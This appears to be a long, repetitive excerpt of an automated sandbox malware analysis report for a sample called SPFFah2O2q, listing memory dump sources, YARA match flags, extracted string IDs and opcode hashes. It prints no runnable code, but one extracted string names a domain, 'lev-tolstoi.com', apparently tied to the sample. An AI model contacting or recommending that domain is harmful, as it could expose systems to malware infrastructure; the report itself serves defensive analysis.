• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID: NDNK$WJeX$X
• API String ID: 0-3631875968
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: "51s$9YB
• API String ID: 0-2722061943
                                                                                                                                                                                                                                                                • Opcode ID: 211a046e9116838b58fef2f862f3bc43e5d0a454b8724f73db8adee7e8caa559
                                                                                                                                                                                                                                                                • Instruction ID: 779a5c1bb40158b59da43047085edf677e041d4ba635d65d9609cd33f89ab022
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 211a046e9116838b58fef2f862f3bc43e5d0a454b8724f73db8adee7e8caa559
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE321976B00622CBCB24CF68D8516BFB3B2FF89310B99856DD442AB364DB395D41CB54
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: !@$,
                                                                                                                                                                                                                                                                • API String ID: 0-2321553346
                                                                                                                                                                                                                                                                • Opcode ID: 53d5da5660c4a43f8d0f64280c8733e9bdccf6cbe85e2db49c8b0f6515059a90
                                                                                                                                                                                                                                                                • Instruction ID: 8ac1d75e3f18f3ca06c62006bbbcc1f171d82c91a9559449bc6cc08738e70f09
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53d5da5660c4a43f8d0f64280c8733e9bdccf6cbe85e2db49c8b0f6515059a90
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A4205B1D042548FDB08CF78C8853AEBFF1AF49310F198279D9A9AB391D7358945CB92
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: Dx$lev-tolstoi.com
                                                                                                                                                                                                                                                                • API String ID: 0-818776348
                                                                                                                                                                                                                                                                • Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                                                                                                                                                                                • Instruction ID: 5bb1130f72a98c6f233d2c217a903bc57bb56de3339a3108bfc93ec34e4a158e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1F1CDB054C3D18ED335CF6594907EBBBE0EB92314F144AAEC8D96B382C735090A8B97
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: Dx$lev-tolstoi.com
                                                                                                                                                                                                                                                                • API String ID: 0-818776348
                                                                                                                                                                                                                                                                • Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                                                                                                                                                                                • Instruction ID: ab29f9e84459f454c0829ee37fb37b76afef963e9afa1b3fdaa4097c18b1ae90
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7F1ECB054D3D18ED3B5CF658484BEBBFE1AB92308F184AADC8D95B652C734050ACB93
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 0K)$4*VP
                                                                                                                                                                                                                                                                • API String ID: 0-3626284114
                                                                                                                                                                                                                                                                • Opcode ID: 958d662d80f610fa8de2bec6fdd7d8beff1fa42db32f20cab0fd5fd8684a20d5
                                                                                                                                                                                                                                                                • Instruction ID: be95a0ee448f85f8141fc34205fa9fdd4d2919aa19831c078dfff85d5c6c32bb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 958d662d80f610fa8de2bec6fdd7d8beff1fa42db32f20cab0fd5fd8684a20d5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0D1163065D3D08ED7258B3984507ABFBE19FA7214F1889ADD4D98B382D7768406CB62
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 0K)$4*VP
                                                                                                                                                                                                                                                                • API String ID: 0-3626284114
                                                                                                                                                                                                                                                                • Opcode ID: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                                                                                                                                                                                                                                                • Instruction ID: 79d6e082e0491a4045e5b840a95bb4df230d34c241beba690eb3c8ed7007ce5a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FD12730A1C3D08ED7258F3994507ABBFE19FA7314F59896ED4C98B382C7798406CB66
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: R2B$6B
                                                                                                                                                                                                                                                                • API String ID: 0-20043878
                                                                                                                                                                                                                                                                • Opcode ID: ac58904699f18f78ac368c51fcd47e09c00d21abb36880cf37e6842ead4d4e32
                                                                                                                                                                                                                                                                • Instruction ID: f5db2046e1d380e536cc29ae1ea4695f6a7d49829660d0c0f3bd76f15908f1aa
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac58904699f18f78ac368c51fcd47e09c00d21abb36880cf37e6842ead4d4e32
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3AD1C276A01116CFDB18CF68DC917AE73B2FB8A311F1A85A9D841E7390DB34AD11CB58
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: XG$|}
                                                                                                                                                                                                                                                                • API String ID: 0-1014376750
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID: XG$|}
• API String ID: 0-1014376750
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: )$IEND
• API String ID: 0-707183367
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID: )$IEND
• API String ID: 0-707183367
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID: InitializeThunk
• String ID: i$r}A
• API String ID: 2994545307-2976846027
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: d$d
• API String ID: 0-195624457
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: P<?$P<?
• API String ID: 0-3449142988
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID: InitializeThunk
• String ID: f
• API String ID: 2994545307-1993550816
Strings
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID: bC
• API String ID: 0-3681614764
                                                                                                                                                                                                                                                                • Opcode ID: 81246caaa5fb78c3d38635f3ad354d87a7ab4eb57a3eaf3217e543b2d80e8b50
                                                                                                                                                                                                                                                                • Instruction ID: 871c5afb2dffc20ff0dbbcf53a0195aac73061a90b0e28cef4dba4d31fdaf636
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81246caaa5fb78c3d38635f3ad354d87a7ab4eb57a3eaf3217e543b2d80e8b50
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3712E23AA18215CFCB04CF28E8905AAB7B2FF8E311F1A847DD54697351D734A952CB88
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: bC
                                                                                                                                                                                                                                                                • API String ID: 0-3681614764
                                                                                                                                                                                                                                                                • Opcode ID: c70fff483ec8e9077dfc10fa089d78eeba6ca480428d69a1677b3b3847d620ad
                                                                                                                                                                                                                                                                • Instruction ID: 5e30844967bebdc7bd1579877bde578fcf76ae60555b00215fe6639be0914efa
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c70fff483ec8e9077dfc10fa089d78eeba6ca480428d69a1677b3b3847d620ad
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7DF1E436A28215CFCB04CF28E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: bC
                                                                                                                                                                                                                                                                • API String ID: 0-3681614764
                                                                                                                                                                                                                                                                • Opcode ID: 1d8feeef0126ffe8c63342afaba4558ed33c57e7ba78c596c66c7e0fa34e77c1
                                                                                                                                                                                                                                                                • Instruction ID: 5e6aaad999615e2ac42fefb03cf1b536ced96fd12a8bf48793a25e995ad5db17
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d8feeef0126ffe8c63342afaba4558ed33c57e7ba78c596c66c7e0fa34e77c1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BAF1E536A28215CFCB04CF68E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: bC
                                                                                                                                                                                                                                                                • API String ID: 0-3681614764
                                                                                                                                                                                                                                                                • Opcode ID: b154c6e34f79c6648591b9b450c448a67bbc93cb44fa5396b7d9856807c8a211
                                                                                                                                                                                                                                                                • Instruction ID: a5988ab96186a7325d1362fbcccc642df08cbf2eaa279a3d6103cdc8c7b46e1e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b154c6e34f79c6648591b9b450c448a67bbc93cb44fa5396b7d9856807c8a211
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7F1F536A28215CFCB04CF68E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: jk
                                                                                                                                                                                                                                                                • API String ID: 0-78326018
                                                                                                                                                                                                                                                                • Opcode ID: 25ef1f9adb694a81f93120e111aa8eff1c89ad6ac93ee7fa2faf286b71ff90ec
                                                                                                                                                                                                                                                                • Instruction ID: 68e7885be5d05e4a2cf040f704cbb8fa7a41bea7ef2f0d8a510bf149587bd7f9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25ef1f9adb694a81f93120e111aa8eff1c89ad6ac93ee7fa2faf286b71ff90ec
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDE1033A618356CBC7188F38DC5126B73E2FF4A351F0AC87DE9818B2A0E779C9558754
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: bC
                                                                                                                                                                                                                                                                • API String ID: 0-3681614764
                                                                                                                                                                                                                                                                • Opcode ID: 10f45940bf441a6cd71f6e58040424d3e031c37bab43412074f48cf734061f8b
                                                                                                                                                                                                                                                                • Instruction ID: 2fa55bda5e41fd724e566356672d144f9f42af162050902131bcbf15531586af
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 10f45940bf441a6cd71f6e58040424d3e031c37bab43412074f48cf734061f8b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9E1C376A28215CFCB08CF28E8905AAB7F2FF8E310F19857DD94697351D734A952CB84
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: {}
                                                                                                                                                                                                                                                                • API String ID: 0-4269290415
                                                                                                                                                                                                                                                                • Opcode ID: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                                                                                                                                                                                                                                                • Instruction ID: 0af4e1219fe889d167e9da05173529857e0f89c87775fbd0e3160429af4db955
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82E101B5608340DFE724DF24E88176FB7B2FB85304F54893DE5859B2A2DB789805CB4A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: "
                                                                                                                                                                                                                                                                • API String ID: 0-123907689
                                                                                                                                                                                                                                                                • Opcode ID: f5bf1b62e76307cdd5fc82252a9a1afcae73f4398661cde8b6da05f895bcd9dc
                                                                                                                                                                                                                                                                • Instruction ID: ccf2f4e9833933b2009195e793b8faf6d5d6e2cba860aec0098ae2c38f35b308
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f5bf1b62e76307cdd5fc82252a9a1afcae73f4398661cde8b6da05f895bcd9dc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDD11F72B083255FC714CE25A89076BB7DAAF84350F89892EECA987381D738DD15C7C6
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: "
                                                                                                                                                                                                                                                                • API String ID: 0-123907689
                                                                                                                                                                                                                                                                • Opcode ID: c49dafb76b3501854f1ecfb32a5253d7c55cb79f5b02df7c17b1cbb688f3955d
                                                                                                                                                                                                                                                                • Instruction ID: 9e32044718118e5129559657483d21b0fd9f1805461a75b01b7cad24c20181e3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c49dafb76b3501854f1ecfb32a5253d7c55cb79f5b02df7c17b1cbb688f3955d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4D1F47264C3555FD715CE24C8807AFBBE6AFC5318F09893DE8A987281D735EA04CB81
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: /,-
                                                                                                                                                                                                                                                                • API String ID: 2994545307-1700940157
                                                                                                                                                                                                                                                                • Opcode ID: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
                                                                                                                                                                                                                                                                • Instruction ID: 73ea5f1ed436ac76404857fefd2ddfa4c8367646346d3918638d2e9e73e3d7e7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EB18E717083014BD714DF25888163BF792EBCA314F14A92EF5D557392DB39EC068B9A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: /,-
                                                                                                                                                                                                                                                                • API String ID: 0-1700940157
                                                                                                                                                                                                                                                                • Opcode ID: bd61eaabca8c3d4106ab26b04688d9f0e7a3b9e8178b00c10dfc939fc062fcac
                                                                                                                                                                                                                                                                • Instruction ID: 1592c8b2317965d13667f8348fa5849d051017aa51cd461f0d9d7116ec24396d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd61eaabca8c3d4106ab26b04688d9f0e7a3b9e8178b00c10dfc939fc062fcac
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34B17B706483644FD7248F248880A7BB7A2EF92318F1A993CF59557291D732EC2DCBA5
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: VtA
                                                                                                                                                                                                                                                                • API String ID: 2994545307-3724035812
                                                                                                                                                                                                                                                                • Opcode ID: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
                                                                                                                                                                                                                                                                • Instruction ID: ed71193d6b2bdbbac52031f97d74cd30495a87e66650ae04c888d17f76a05038
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5DC139766083419FD714CF28D8817AFB7E2AB95310F09892EE4D5D7392C738D885C75A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: bC
                                                                                                                                                                                                                                                                • API String ID: 0-3681614764
                                                                                                                                                                                                                                                                • Opcode ID: 12f582ca5cb52f02cbb6c7a65b3a2962543ce7e68b8d395708436d5f2da692ba
                                                                                                                                                                                                                                                                • Instruction ID: 4d20f92c875f40788edf4275f174b054e137e174bc84352c0492b1430194fbac
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12f582ca5cb52f02cbb6c7a65b3a2962543ce7e68b8d395708436d5f2da692ba
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3C1C176A28215CFCB08CF68E8905AAB7F2FF8E310F19897DD54597351C734A952CB84
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
